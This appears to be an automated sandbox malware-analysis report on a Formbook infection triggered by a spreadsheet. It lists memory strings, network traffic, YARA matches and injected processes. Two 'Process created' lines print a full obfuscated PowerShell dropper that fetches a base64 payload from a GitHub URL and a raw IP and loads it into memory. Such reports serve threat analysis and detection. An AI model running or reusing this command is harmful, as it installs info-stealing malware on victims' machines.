      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spanish-classes-13883.bondReferer:
      Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: m2g.me.url.4.drString found in binary or memory: https://m2g.me/
      Source: PO.78NO9.xls, a080.url.4.drString found in binary or memory: https://m2g.me/a080
      Source: FC830000.0.dr, ~DF8B1FFFD9F6395A18.TMP.0.drString found in binary or memory: https://m2g.me/a080yX
      Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 0000000F.00000002.481286410.00000000025CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
      Source: powershell.exe, 0000000F.00000002.481286410.00000000025CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
      Source: powershell.exe, 0000000F.00000002.481286410.00000000025CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfXh;
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
      Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49161 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0090AC37 LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,GetClientRect,GetWindowDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleDC,SelectPalette,SelectPalette,RealizePalette,SelectObject,SelectObject,BitBlt,SelectObject,SelectObject,StretchBlt,SelectObject,SelectObject,BitBlt,SelectObject,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawIconEx,SelectObject,SelectPalette,SelectPalette,DeleteDC,DeleteDC,DeleteDC,ReleaseDC,GetLastError,DeleteObject,DeleteObject,DeleteObject,DeleteObject,27_2_0090AC37

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000017.00000002.638758536.0000000006123000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
      Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: powershell.exe PID: 2660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 1368, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: aspnet_regbrowsers.exe PID: 2452, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: aspnet_regbrowsers.exe PID: 3760, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: mstsc.exe PID: 4060, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6035E009.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: PO.78NO9.xlsOLE: Microsoft Excel 2007+
      Source: PO.78NO9.xlsOLE: Microsoft Excel 2007+
      Source: FC830000.0.drOLE: Microsoft Excel 2007+
      Source: FC830000.0.drOLE: Microsoft Excel 2007+
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a080.urlJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\m2g.me.urlJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 770B0000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeMemory allocated: 770B0000 page execute and read and write
      Source: C:\Windows\SysWOW64\mstsc.exeMemory allocated: 770B0000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F00C4 NtCreateFile,LdrInitializeThunk,22_2_009F00C4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F0048 NtProtectVirtualMemory,LdrInitializeThunk,22_2_009F0048
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F0078 NtResumeThread,LdrInitializeThunk,22_2_009F0078
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EF9F0 NtClose,LdrInitializeThunk,22_2_009EF9F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EF900 NtReadFile,LdrInitializeThunk,22_2_009EF900
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,22_2_009EFAD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFAE8 NtQueryInformationProcess,LdrInitializeThunk,22_2_009EFAE8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFBB8 NtQueryInformationToken,LdrInitializeThunk,22_2_009EFBB8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFB68 NtFreeVirtualMemory,LdrInitializeThunk,22_2_009EFB68
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFC90 NtUnmapViewOfSection,LdrInitializeThunk,22_2_009EFC90
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFC60 NtMapViewOfSection,LdrInitializeThunk,22_2_009EFC60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFD8C NtDelayExecution,LdrInitializeThunk,22_2_009EFD8C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFDC0 NtQuerySystemInformation,LdrInitializeThunk,22_2_009EFDC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFEA0 NtReadVirtualMemory,LdrInitializeThunk,22_2_009EFEA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,22_2_009EFED0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFFB4 NtCreateSection,LdrInitializeThunk,22_2_009EFFB4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F0060 NtQuerySection,22_2_009F0060
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F01D4 NtSetValueKey,22_2_009F01D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F010C NtOpenDirectoryObject,22_2_009F010C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F07AC NtCreateMutant,22_2_009F07AC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F0C40 NtGetContextThread,22_2_009F0C40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F10D0 NtOpenProcessToken,22_2_009F10D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F1148 NtOpenThread,22_2_009F1148
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EF8CC NtWaitForSingleObject,22_2_009EF8CC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EF938 NtWriteFile,22_2_009EF938
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F1930 NtSetContextThread,22_2_009F1930
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFAB8 NtQueryValueKey,22_2_009EFAB8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFA20 NtQueryInformationFile,22_2_009EFA20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFA50 NtEnumerateValueKey,22_2_009EFA50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFBE8 NtQueryVirtualMemory,22_2_009EFBE8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFB50 NtCreateKey,22_2_009EFB50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFC30 NtOpenProcess,22_2_009EFC30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFC48 NtSetInformationFile,22_2_009EFC48
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F1D80 NtSuspendThread,22_2_009F1D80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFD5C NtEnumerateKey,22_2_009EFD5C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFE24 NtWriteVirtualMemory,22_2_009EFE24
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFFFC NtCreateProcessEx,22_2_009EFFFC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009EFF34 NtQueueApcThread,22_2_009EFF34
      Source: C:\Windows\explorer.exeCode function: 23_2_0610CE12 NtProtectVirtualMemory,23_2_0610CE12
      Source: C:\Windows\explorer.exeCode function: 23_2_0610B232 NtCreateFile,23_2_0610B232
      Source: C:\Windows\explorer.exeCode function: 23_2_0610CE0A NtProtectVirtualMemory,23_2_0610CE0A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E00C4 NtCreateFile,LdrInitializeThunk,27_2_021E00C4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E07AC NtCreateMutant,LdrInitializeThunk,27_2_021E07AC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFAB8 NtQueryValueKey,LdrInitializeThunk,27_2_021DFAB8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,27_2_021DFAD0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFAE8 NtQueryInformationProcess,LdrInitializeThunk,27_2_021DFAE8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFB50 NtCreateKey,LdrInitializeThunk,27_2_021DFB50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFB68 NtFreeVirtualMemory,LdrInitializeThunk,27_2_021DFB68
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFBB8 NtQueryInformationToken,LdrInitializeThunk,27_2_021DFBB8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DF900 NtReadFile,LdrInitializeThunk,27_2_021DF900
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DF9F0 NtClose,LdrInitializeThunk,27_2_021DF9F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,27_2_021DFED0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFFB4 NtCreateSection,LdrInitializeThunk,27_2_021DFFB4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFC60 NtMapViewOfSection,LdrInitializeThunk,27_2_021DFC60
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFD8C NtDelayExecution,LdrInitializeThunk,27_2_021DFD8C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFDC0 NtQuerySystemInformation,LdrInitializeThunk,27_2_021DFDC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E0048 NtProtectVirtualMemory,27_2_021E0048
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E0078 NtResumeThread,27_2_021E0078
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E0060 NtQuerySection,27_2_021E0060
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E10D0 NtOpenProcessToken,27_2_021E10D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E010C NtOpenDirectoryObject,27_2_021E010C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E1148 NtOpenThread,27_2_021E1148
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E01D4 NtSetValueKey,27_2_021E01D4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFA20 NtQueryInformationFile,27_2_021DFA20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFA50 NtEnumerateValueKey,27_2_021DFA50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFBE8 NtQueryVirtualMemory,27_2_021DFBE8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DF8CC NtWaitForSingleObject,27_2_021DF8CC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DF938 NtWriteFile,27_2_021DF938
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E1930 NtSetContextThread,27_2_021E1930
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFE24 NtWriteVirtualMemory,27_2_021DFE24
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFEA0 NtReadVirtualMemory,27_2_021DFEA0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFF34 NtQueueApcThread,27_2_021DFF34
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFFFC NtCreateProcessEx,27_2_021DFFFC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFC30 NtOpenProcess,27_2_021DFC30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFC48 NtSetInformationFile,27_2_021DFC48
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E0C40 NtGetContextThread,27_2_021E0C40
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFC90 NtUnmapViewOfSection,27_2_021DFC90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021DFD5C NtEnumerateKey,27_2_021DFD5C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021E1D80 NtSuspendThread,27_2_021E1D80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009A330 NtCreateFile,27_2_0009A330
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009A3E0 NtReadFile,27_2_0009A3E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009A460 NtClose,27_2_0009A460
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009A510 NtAllocateVirtualMemory,27_2_0009A510
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009A50A NtAllocateVirtualMemory,27_2_0009A50A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_002504BC17_2_002504BC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_002594EF17_2_002594EF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_002548A817_2_002548A8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_0025C0F817_2_0025C0F8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_0025116817_2_00251168
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_002551D817_2_002551D8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_0025D28817_2_0025D288
